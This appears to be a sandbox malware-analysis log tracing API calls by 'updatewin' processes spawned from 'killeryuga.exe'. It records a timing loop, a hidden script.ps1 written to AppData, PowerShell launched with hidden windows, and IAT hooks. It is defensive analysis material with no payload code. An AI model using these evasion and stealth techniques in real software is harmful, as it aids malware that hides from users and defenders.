Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System Get Time type = Ticks, time = 119839 True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
System Get Time type = System Time True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 18298853611 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1, size = 49 True 1
Fn
Data
Process Create process_name = powershell, os_pid = 0xa4c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Process Create process_name = powershell, os_pid = 0xb04, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Process #11: updatewin.exe
714 0
»
Information Value
ID #11
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15
OS Process Information
»
Information Value
PID 0xa18
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A1C
0x A70
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x004F5000 0x004F5FFF Marked Executable - 32-bit - False
...
updatewin.exe 0x00400000 0x0044DFFF Forced - 32-bit - False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000004e0000:+0x16785 90. entry of updatewin.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000900000:+0x700000
...
IAT private_0x00000000004e0000:+0x16785 121. entry of updatewin.exe 4 bytes user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x0000000000900000:+0x700000
...
Threads
Thread 0xa1c
704 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
System Get Time type = Ticks, time = 120198 True 1
Fn
System Get Time type = Performance Ctr, time = 18241963676 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
